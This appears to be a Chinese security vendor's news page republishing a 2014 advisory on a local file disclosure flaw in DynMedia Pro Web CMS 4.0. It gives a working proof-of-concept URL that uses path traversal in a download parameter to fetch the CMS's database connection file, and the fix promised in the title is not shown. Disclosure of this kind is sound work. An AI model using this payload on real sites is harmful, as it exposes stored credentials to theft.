English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 业界动态 >> DynMedia Pro Web CMS 4.0本地文件泄露漏洞及修复

 

DynMedia Pro Web CMS 4.0本地文件泄露漏洞及修复

威盾防火墙 2014-12-23

 

DynMedia Pro 是一款内容管理系统,DynMedia Pro存在信息泄露漏洞,可能导致远程下载CMS中关键文件(如数据库连接文件)。

[+]info:
~~~~~~~~~
DynMedia Pro Web CMS 4.0 ||Local File Disclosure Exploit

[+]poc:
~~~~~~~~~
[Vulnerable File ]
    http://www.2cto.com/downloadfile.php?dwnfile=[LFD]
[Example ]
    http://www.2cto.com/downloadfile.php?dwnfile=../library/dbconnect.php


相关内容: 最新内容:
Web2Project 2.3 SQL注入漏洞及修复[2014-12-23]
First Escort Marketing多个SQL注入漏洞及修复[2014-12-23]
php远程文件包含漏洞原理[2014-12-23]
用防盗链系统修复IIS6.0解析漏洞的技巧[2014-12-23]
阻击黑客利用第三方软件漏洞发起的攻击[2014-12-20]
深信服EasyConnect封堵APP漏洞让移动办公安全[2014-12-20]
Web2Project 2.3 SQL注入漏洞及修复[2014-12-23]
First Escort Marketing多个SQL注入漏洞及修复[2014-12-23]
php远程文件包含漏洞原理[2014-12-23]
ASP后门之终极伪装+在线琳法ASP加密解密[2014-12-23]
SA注入拿SQL的HASH[2014-12-23]
在过滤单引号的条件下进行mssql盲注[2014-12-23]